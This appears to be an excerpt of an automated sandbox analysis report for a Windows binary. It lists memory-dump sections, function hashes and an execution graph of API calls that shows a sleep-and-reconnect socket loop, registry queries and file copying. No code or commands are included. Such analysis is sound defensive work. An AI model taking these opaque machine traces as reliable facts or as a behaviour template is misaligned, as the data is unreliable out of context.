    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: signal
    • String ID: CCG
    • API String ID: 1946981877-1584390748
    • Opcode ID: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
    • Instruction ID: fac8c024003df146176ce8d6e06926f9d09b35457081833f93c77655471f53cc
    • Opcode Fuzzy Hash: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
    • Instruction Fuzzy Hash: F521A3A9E0D70767FA747215944337C99A19F48321FA88BB6C98D833D5DE1CF8817231
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fprintf
    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
    • API String ID: 383729395-3474627141
    • Opcode ID: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
    • Instruction ID: 70f171ee1d090ba955fc0c9fdceb7dd88a966cc864832e65e15eac138d967d42
    • Opcode Fuzzy Hash: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
    • Instruction Fuzzy Hash: ED115166808F8592E6119F1CE0423EAF370FF9A359FA05726EBC816224DF3DD1528700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fprintf
    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
    • API String ID: 383729395-4273532761
    • Opcode ID: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
    • Instruction ID: cf739dbd4b7ec709176ad720ea2c2a55708cd003a242f2be01a83bdaac4171fa
    • Opcode Fuzzy Hash: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
    • Instruction Fuzzy Hash: E3F0816A808F8582E211DF1CE0012ABF370FF9E389FA05326EBC926624DF3DD1429700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fprintf
    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
    • API String ID: 383729395-4283191376
    • Opcode ID: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
    • Instruction ID: 89250ca0098f24f93efaa3cc87a0d0ce13b325175ec918bc03b5fe902c45d746
    • Opcode Fuzzy Hash: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
    • Instruction Fuzzy Hash: ADF0816A808F8582E211DF1CE0012ABF370FF9E389FA05326EBC926624DF3DD5029710
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fprintf
    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
    • API String ID: 383729395-2187435201
    • Opcode ID: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
    • Instruction ID: d1b4b79cd2f6f8e79556ec46683fa0c14c3d08471348f86726a388d210f54992
    • Opcode Fuzzy Hash: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
    • Instruction Fuzzy Hash: 4BF0816A808F8592E211DF1CE0412ABF370FF9E389FA05326EBC926624DF3DD1029700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fprintf
    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
    • API String ID: 383729395-4064033741
    • Opcode ID: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
    • Instruction ID: afd0dec3a491d0a8759b1f8225daaf4da00e228e9846b57652f15714ef64b54c
    • Opcode Fuzzy Hash: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
    • Instruction Fuzzy Hash: AAF0816A808F8582E211DF1CE0012ABF370FF9E789FA05326EBC926625DF3DD1029710
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fprintf
    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
    • API String ID: 383729395-2713391170
    • Opcode ID: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
    • Instruction ID: 1c25385fc98e6a2216f059bfb54bca9659ad5431e3eaac16f4c5791fdef2be53
    • Opcode Fuzzy Hash: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
    • Instruction Fuzzy Hash: 16F0816A808F8592E211DF1CE0012ABF370FF9E789FA05326EBC926625DF3DD1029700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fprintf
    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
    • API String ID: 383729395-2468659920
    • Opcode ID: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
    • Instruction ID: 94534d71350d0a36106a9eb2b3e7caf2467ed10f266c91f72aca6fc646cbe2f0
    • Opcode Fuzzy Hash: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
    • Instruction Fuzzy Hash: CCF01D6A808F8582D2119F19E4012ABB370FF9E789F605726EFC826625DF2DD5429700
    Memory Dump Source
    • Source File: 0000000C.00000002.2031075049.00007FF6CE981000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CE980000, based on PE: true
    • Associated: 0000000C.00000002.2031060871.00007FF6CE980000.00000002.00000001.01000000.00000007.sdmpDownload File
    • Associated: 0000000C.00000002.2031093025.00007FF6CE990000.00000004.00000001.01000000.00000007.sdmpDownload File
    • Associated: 0000000C.00000002.2031093025.00007FF6CEF8C000.00000004.00000001.01000000.00000007.sdmpDownload File
    • Associated: 0000000C.00000002.2031093025.00007FF6CEF8E000.00000004.00000001.01000000.00000007.sdmpDownload File
    • Associated: 0000000C.00000002.2031836984.00007FF6CF39E000.00000002.00000001.01000000.00000007.sdmpDownload File
    • Associated: 0000000C.00000002.2031857852.00007FF6CF3A6000.00000004.00000001.01000000.00000007.sdmpDownload File
    • Associated: 0000000C.00000002.2031857852.00007FF6CF3A8000.00000004.00000001.01000000.00000007.sdmpDownload File
    • Associated: 0000000C.00000002.2031900304.00007FF6CF3A9000.00000008.00000001.01000000.00000007.sdmpDownload File
    • Associated: 0000000C.00000002.2031920467.00007FF6CF3AC000.00000002.00000001.01000000.00000007.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_7ff6ce980000_dx4w727xyq6q2yaxja.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
    • Instruction ID: 7337c5e3b2e32c8a8906608ffcdf5b1cd65050f95b48d354eb40bd099d7b9067
    • Opcode Fuzzy Hash: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
    • Instruction Fuzzy Hash: C7B01231A0424184F7002F43D88125C7770AB14702F505031D44C5B373CF7D54404B60

    Execution Graph

    Execution Coverage:6.4%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:3.5%
    Total number of Nodes:2000
    Total number of Limit Nodes:30
    execution_graph 57483 7ffe126d605a 57488 7ffe126d6065 57483->57488 57484 7ffe126d616e 57485 7ffe126d617b 57484->57485 57550 7ffe126d14c5 57484->57550 57487 7ffe126d608d Sleep 57487->57488 57488->57484 57488->57487 57491 7ffe126d6142 Sleep 57488->57491 57492 7ffe126d14c5 10 API calls 57488->57492 57494 7ffe126d612e memcpy 57488->57494 57495 7ffe126d175c socket 57488->57495 57530 7ffe126d1c0a 57488->57530 57541 7ffe126d5f90 57488->57541 57491->57488 57492->57488 57494->57488 57496 7ffe126d195b WSAGetLastError 57495->57496 57497 7ffe126d1793 57495->57497 57500 7ffe126d77a2 6 API calls 57496->57500 57498 7ffe126d1797 57497->57498 57499 7ffe126d17b5 57497->57499 57559 7ffe126d13f9 57498->57559 57503 7ffe126d13f9 8 API calls 57499->57503 57502 7ffe126d197f 57500->57502 57505 7ffe126d17cf 57502->57505 57506 7ffe126d1989 57502->57506 57507 7ffe126d17b3 57503->57507 57511 7ffe126d77a2 6 API calls 57505->57511 57576 7ffe126d77a2 57506->57576 57510 7ffe126d17c7 57507->57510 57572 7ffe126d152a setsockopt 57507->57572 57508 7ffe126d180e 57508->57510 57513 7ffe126d1813 htonl htons connect 57508->57513 57516 7ffe126d14c5 10 API calls 57510->57516 57515 7ffe126d17f0 57511->57515 57517 7ffe126d186c WSAGetLastError 57513->57517 57518 7ffe126d1851 57513->57518 57515->57488 57516->57505 57520 7ffe126d187d 57517->57520 57521 7ffe126d192e WSAGetLastError 57517->57521 57519 7ffe126d13f9 8 API calls 57518->57519 57523 7ffe126d185e 57519->57523 57520->57510 57524 7ffe126d1885 select 57520->57524 57522 7ffe126d77a2 6 API calls 57521->57522 57522->57510 57523->57502 57523->57510 57525 7ffe126d18e6 57524->57525 57526 7ffe126d1910 57524->57526 57525->57518 57527 7ffe126d18ec WSAGetLastError 57525->57527 57528 7ffe126d77a2 6 API calls 57526->57528 57529 7ffe126d77a2 6 API calls 57527->57529 57528->57510 57529->57510 57531 7ffe126d1c98 57530->57531 57532 7ffe126d1c24 57530->57532 57533 7ffe126d77a2 6 API calls 57531->57533 57532->57531 57534 7ffe126d1c29 recv 57532->57534 57537 7ffe126d1c43 57533->57537 57535 7ffe126d1c4c WSAGetLastError 57534->57535 57536 7ffe126d1c3f 57534->57536 57535->57537 57538 7ffe126d1c60 57535->57538 57536->57537 57539 7ffe126d77a2 6 API calls 57536->57539 57537->57488 57540 7ffe126d77a2 6 API calls 57538->57540 57539->57537 57540->57537 57542 7ffe126d5fa8 57541->57542 57543 7ffe126d6052 57541->57543 57542->57543 57595 7ffe126d22f5 57542->57595 57543->57488 57546 7ffe126d6044 LeaveCriticalSection 57546->57543 57547 7ffe126d5fd8 57547->57546 57548 7ffe126d77a2 6 API calls 57547->57548 57598 7ffe126dbc77 57547->57598 57548->57547 57551 7ffe126d14d9 57550->57551 57558 7ffe126d14d3 57550->57558 57880 7ffe126d1462 shutdown 57551->57880 57554 7ffe126d1509 WSAGetLastError 57557 7ffe126d77a2 6 API calls 57554->57557 57555 7ffe126d14f1 57556 7ffe126d77a2 6 API calls 57555->57556 57556->57558 57557->57558 57558->57485 57560 7ffe126d1409 ioctlsocket 57559->57560 57562 7ffe126d142c 57560->57562 57563 7ffe126d143d WSAGetLastError 57560->57563 57562->57508 57565 7ffe126d1344 setsockopt 57562->57565 57564 7ffe126d77a2 6 API calls 57563->57564 57564->57562 57566 7ffe126d1379 setsockopt 57565->57566 57567 7ffe126d13d4 WSAGetLastError 57565->57567 57569 7ffe126d13a5 57566->57569 57570 7ffe126d13af WSAGetLastError 57566->57570 57568 7ffe126d77a2 6 API calls 57567->57568 57568->57569 57569->57507 57571 7ffe126d77a2 6 API calls 57570->57571 57571->57569 57573 7ffe126d1567 57572->57573 57574 7ffe126d1571 WSAGetLastError 57572->57574 57573->57508 57575 7ffe126d77a2 6 API calls 57574->57575 57575->57573 57577 7ffe126d77b0 57576->57577 57587 7ffe126deaa0 57577->57587 57580 7ffe126d786c EnterCriticalSection 57582 7ffe126d7886 LeaveCriticalSection 57580->57582 57584 7ffe126d78a3 57580->57584 57581 7ffe126d7837 fwrite fflush 57583 7ffe126d7860 57581->57583 57582->57581 57583->57515 57585 7ffe126d78dd CopyFileA 57584->57585 57586 7ffe126d7915 57585->57586 57586->57582 57588 7ffe126deac5 57587->57588 57589 7ffe126deaae 57587->57589 57594 7ffe126dfb00 fputc 57588->57594 57593 7ffe126dfb00 fputc 57589->57593 57592 7ffe126d7809 57592->57580 57592->57581 57592->57583 57593->57592 57594->57592 57596 7ffe126d230b GetSystemTimeAsFileTime 57595->57596 57597 7ffe126d2300 EnterCriticalSection 57595->57597 57596->57597 57597->57547 57599 7ffe126dbc99 57598->57599 57600 7ffe126dbd05 57598->57600 57610 7ffe126dbcb0 57599->57610 57663 7ffe126d689b 57599->57663 57601 7ffe126dbd0f 57600->57601 57602 7ffe126dbd20 57600->57602 57603 7ffe126dbcfb 57601->57603 57607 7ffe126d22f5 GetSystemTimeAsFileTime 57601->57607 57604 7ffe126d689b 2 API calls 57602->57604 57603->57547 57604->57603 57609 7ffe126dbe02 57607->57609 57608 7ffe126dc0d3 57611 7ffe126dc167 57608->57611 57620 7ffe126dc118 57608->57620 57693 7ffe126d7400 GetModuleHandleExA 57609->57693 57610->57603 57613 7ffe126dc262 57610->57613 57614 7ffe126dc26f GetProcessHeap HeapAlloc 57610->57614 57616 7ffe126d689b 2 API calls 57611->57616 57613->57614 57618 7ffe126dc297 memcpy 57614->57618 57619 7ffe126dc309 57614->57619 57617 7ffe126dc171 57616->57617 57666 7ffe126db910 57617->57666 57646 7ffe126dc2d7 57618->57646 57623 7ffe126d77a2 6 API calls 57619->57623 57625 7ffe126dc187 57620->57625 57626 7ffe126dc142 57620->57626 57627 7ffe126dc02f 57623->57627 57624 7ffe126dbeb8 57628 7ffe126dc039 57624->57628 57629 7ffe126dbec0 57624->57629 57672 7ffe126db9f4 57625->57672 57633 7ffe126dc14c 57626->57633 57634 7ffe126dc196 57626->57634 57627->57603 57730 7ffe126d3805 30 API calls 57628->57730 57698 7ffe126dd3f2 57629->57698 57638 7ffe126d689b 2 API calls 57633->57638 57636 7ffe126d689b 2 API calls 57634->57636 57640 7ffe126dc1a0 57636->57640 57637 7ffe126dc06c 57637->57629 57638->57603 57639 7ffe126dbefe 57725 7ffe126d68e2 8 API calls 57639->57725 57640->57603 57645 7ffe126d22f5 GetSystemTimeAsFileTime 57640->57645 57641 7ffe126dc2ed GetProcessHeap HeapFree 57641->57603 57642 7ffe126dc08c memcpy 57642->57639 57644 7ffe126dbf08 57726 7ffe126d6a68 10 API calls 57644->57726 57647 7ffe126dc1fd 57645->57647 57652 7ffe126dc2df 57646->57652 57732 7ffe126dbc0e 8 API calls 57646->57732 57650 7ffe126d689b 2 API calls 57647->57650 57653 7ffe126dc20f 57650->57653 57651 7ffe126dbf3d 57727 7ffe126d9370 58 API calls 57651->57727 57652->57603 57652->57641 57731 7ffe126d61a2 13 API calls 57653->57731 57657 7ffe126dbfa9 57662 7ffe126dbfd0 57657->57662 57728 7ffe126d1290 7 API calls 57657->57728 57658 7ffe126dbfe9 GetProcessHeap HeapFree 57659 7ffe126dc000 57658->57659 57729 7ffe126d61a2 13 API calls 57659->57729 57662->57658 57662->57659 57664 7ffe126d68a6 57663->57664 57665 7ffe126d68b1 QueryPerformanceFrequency QueryPerformanceCounter 57663->57665 57664->57608 57664->57610 57665->57664 57668 7ffe126db920 57666->57668 57671 7ffe126db93d 57666->57671 57667 7ffe126db954 57667->57603 57668->57671 57733 7ffe126db482 57668->57733 57669 7ffe126d14c5 10 API calls 57669->57667 57671->57667 57671->57669 57673 7ffe126dba08 57672->57673 57675 7ffe126dbb8c 57672->57675 57673->57675 57676 7ffe126dba2d 57673->57676 57674 7ffe126dba66 57674->57603 57675->57674 57677 7ffe126d175c 27 API calls 57675->57677 57678 7ffe126dba37 57676->57678 57679 7ffe126dba89 57676->57679 57681 7ffe126dbbc3 57677->57681 57682 7ffe126dba44 57678->57682 57683 7ffe126dbb10 57678->57683 57778 7ffe126db501 57679->57778 57681->57674 57687 7ffe126d689b 2 API calls 57681->57687 57682->57674 57816 7ffe126db800 68 API calls 57682->57816 57817 7ffe126db30e 48 API calls 57683->57817 57686 7ffe126dbb1c 57686->57674 57691 7ffe126d689b 2 API calls 57686->57691 57687->57674 57689 7ffe126d689b 2 API calls 57689->57674 57690 7ffe126dba5e 57690->57674 57692 7ffe126d689b 2 API calls 57690->57692 57691->57674 57692->57674 57694 7ffe126d7428 57693->57694 57695 7ffe126d7432 GetLastError 57693->57695 57697 7ffe126d5ec9 12 API calls 57694->57697 57696 7ffe126d77a2 6 API calls 57695->57696 57696->57694 57697->57624 57699 7ffe126dd41b 57698->57699 57723 7ffe126dd47a 57698->57723 57701 7ffe126dd4dd 57699->57701 57702 7ffe126dd424 57699->57702 57700 7ffe126d77a2 6 API calls 57720 7ffe126dd4d3 57700->57720 57703 7ffe126d77a2 6 API calls 57701->57703 57704 7ffe126dd42d 57702->57704 57705 7ffe126dd510 57702->57705 57703->57720 57707 7ffe126dd436 RegOpenKeyExA 57704->57707 57708 7ffe126dd543 57704->57708 57706 7ffe126d77a2 6 API calls 57705->57706 57706->57720 57709 7ffe126dd45d 57707->57709 57710 7ffe126dd576 RegQueryValueExA 57707->57710 57711 7ffe126d77a2 6 API calls 57708->57711 57713 7ffe126d77a2 6 API calls 57709->57713 57722 7ffe126dd5a4 57710->57722 57724 7ffe126dd5f7 RegCloseKey 57710->57724 57711->57720 57712 7ffe126dd879 57714 7ffe126d77a2 6 API calls 57712->57714 57713->57723 57717 7ffe126dbeec 57714->57717 57716 7ffe126dd89c 57717->57639 57717->57642 57718 7ffe126dd6d6 57718->57716 57721 7ffe126d77a2 6 API calls 57718->57721 57719 7ffe126d77a2 6 API calls 57719->57722 57720->57712 57720->57718 57721->57717 57722->57719 57722->57724 57723->57700 57723->57720 57724->57720 57725->57644 57726->57651 57727->57657 57728->57662 57729->57627 57730->57637 57731->57603 57732->57652 57734 7ffe126db49e 57733->57734 57735 7ffe126db490 57733->57735 57734->57671 57741 7ffe126db456 57735->57741 57740 7ffe126d14c5 10 API calls 57740->57734 57742 7ffe126db463 57741->57742 57743 7ffe126db46d 57741->57743 57742->57743 57744 7ffe126d14c5 10 API calls 57742->57744 57743->57734 57745 7ffe126dafb0 57743->57745 57744->57743 57747 7ffe126dafdf 57745->57747 57746 7ffe126deaa0 fputc 57746->57747 57747->57746 57748 7ffe126db044 57747->57748 57749 7ffe126daff3 GetProcessHeap HeapReAlloc 57747->57749 57750 7ffe126db0a1 GetProcessHeap HeapAlloc 57747->57750 57751 7ffe126d77a2 6 API calls 57748->57751 57749->57747 57752 7ffe126db0dd 57749->57752 57750->57747 57754 7ffe126db0c5 57750->57754 57753 7ffe126db05a strlen 57751->57753 57756 7ffe126d77a2 6 API calls 57752->57756 57764 7ffe126daf98 57753->57764 57755 7ffe126d77a2 6 API calls 57754->57755 57758 7ffe126db0db 57755->57758 57759 7ffe126db0f3 57756->57759 57761 7ffe126db10f 57758->57761 57759->57761 57762 7ffe126db0f8 GetProcessHeap HeapFree 57759->57762 57761->57740 57762->57761 57763 7ffe126db080 GetProcessHeap HeapFree 57763->57761 57767 7ffe126d1cbd 57764->57767 57768 7ffe126d1d6c 57767->57768 57769 7ffe126d1ce8 57767->57769 57770 7ffe126d77a2 6 API calls 57768->57770 57769->57768 57775 7ffe126d1ced 57769->57775 57771 7ffe126d1d40 57770->57771 57771->57761 57771->57763 57772 7ffe126d1cf6 send 57774 7ffe126d1d1a WSAGetLastError 57772->57774 57772->57775 57773 7ffe126d1d39 57773->57771 57777 7ffe126d77a2 6 API calls 57773->57777 57776 7ffe126d77a2 6 API calls 57774->57776 57775->57772 57775->57773 57776->57773 57777->57771 57779 7ffe126db536 57778->57779 57780 7ffe126db7c0 57778->57780 57781 7ffe126db5a5 57779->57781 57782 7ffe126db591 strlen 57779->57782 57780->57674 57780->57689 57818 7ffe126d275a 57781->57818 57782->57781 57803 7ffe126db673 57782->57803 57786 7ffe126db482 21 API calls 57786->57780 57788 7ffe126dafb0 17 API calls 57789 7ffe126db614 57788->57789 57789->57803 57827 7ffe126db217 57789->57827 57803->57780 57803->57786 57816->57690 57817->57686 57819 7ffe126d2776 57818->57819 57820 7ffe126d27b2 57818->57820 57819->57820 57840 7ffe126d273a rand_s 57819->57840 57822 7ffe126db2da 57820->57822 57841 7ffe126daf6a 57822->57841 57825 7ffe126db2ff 57825->57788 57825->57803 57867 7ffe126db132 57827->57867 57830 7ffe126db232 57831 7ffe126db23c 57831->57803 57840->57819 57842 7ffe126d175c 27 API calls 57841->57842 57843 7ffe126daf77 57842->57843 57844 7ffe126daf80 57843->57844 57860 7ffe126d1596 setsockopt 57843->57860 57844->57825 57846 7ffe126db24b 57844->57846 57847 7ffe126dafb0 17 API calls 57846->57847 57848 7ffe126db260 57847->57848 57849 7ffe126db2a9 57848->57849 57850 7ffe126db217 29 API calls 57848->57850 57852 7ffe126d14c5 10 API calls 57849->57852 57851 7ffe126db26c 57850->57851 57864 7ffe126daa20 strcmp strcmp strcmp strcmp 57851->57864 57854 7ffe126db2b6 57852->57854 57858 7ffe126db2a4 57854->57858 57866 7ffe126dab8d 6 API calls 57854->57866 57855 7ffe126db298 57855->57849 57858->57825 57861 7ffe126d15cb 57860->57861 57862 7ffe126d15d5 WSAGetLastError 57860->57862 57861->57844 57863 7ffe126d77a2 6 API calls 57862->57863 57863->57861 57864->57855 57866->57858 57868 7ffe126db15a 57867->57868 57869 7ffe126db172 57867->57869 57868->57869 57870 7ffe126db163 memset 57868->57870 57869->57830 57869->57831 57881 7ffe126d147b 57880->57881 57882 7ffe126d1499 WSAGetLastError 57880->57882 57883 7ffe126d77a2 6 API calls 57881->57883 57884 7ffe126d14a6 57882->57884 57886 7ffe126d1491 closesocket 57882->57886 57883->57886 57885 7ffe126d77a2 6 API calls 57884->57885 57885->57886 57886->57554 57886->57555 57887 7ffe11ec26da 57891 7ffe11ec26e5 57887->57891 57888 7ffe11ec27ee 57889 7ffe11ec27fb 57888->57889 57946 7ffe11ec4055 10 API calls 57888->57946 57890 7ffe11ec270d Sleep 57890->57891 57891->57888 57891->57890 57894 7ffe11ec4055 10 API calls 57891->57894 57896 7ffe11ec27c2 Sleep 57891->57896 57898 7ffe11ec27ae memcpy 57891->57898 57899 7ffe11ec42ec socket 57891->57899 57934 7ffe11ec479a 57891->57934 57945 7ffe11ec2610 9 API calls 57891->57945 57894->57891 57896->57891 57898->57891 57900 7ffe11ec44eb WSAGetLastError 57899->57900 57901 7ffe11ec4323 57899->57901 57902 7ffe11ec1352 6 API calls 57900->57902 57903 7ffe11ec4327 57901->57903 57904 7ffe11ec4345 57901->57904 57905 7ffe11ec450f 57902->57905 57947 7ffe11ec3f89 57903->57947 57906 7ffe11ec3f89 8 API calls 57904->57906 57908 7ffe11ec4519 57905->57908 57909 7ffe11ec435f 57905->57909 57910 7ffe11ec4343 57906->57910 57964 7ffe11ec1352 57908->57964 57914 7ffe11ec1352 6 API calls 57909->57914 57913 7ffe11ec4357 57910->57913 57960 7ffe11ec40ba setsockopt 57910->57960 57975 7ffe11ec4055 10 API calls 57913->57975 57916 7ffe11ec4380 57914->57916 57915 7ffe11ec439e 57915->57913 57919 7ffe11ec43a3 htonl htons connect 57915->57919 57916->57891 57921 7ffe11ec43fc WSAGetLastError 57919->57921 57922 7ffe11ec43e1 57919->57922 57923 7ffe11ec440d 57921->57923 57924 7ffe11ec44be WSAGetLastError 57921->57924 57925 7ffe11ec3f89 8 API calls 57922->57925 57923->57913 57927 7ffe11ec4415 select 57923->57927 57928 7ffe11ec1352 6 API calls 57924->57928 57926 7ffe11ec43ee 57925->57926 